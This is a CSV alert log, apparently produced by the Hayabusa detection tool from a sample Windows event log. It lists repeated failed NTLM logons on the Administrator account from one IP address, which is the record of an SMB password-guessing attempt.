2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
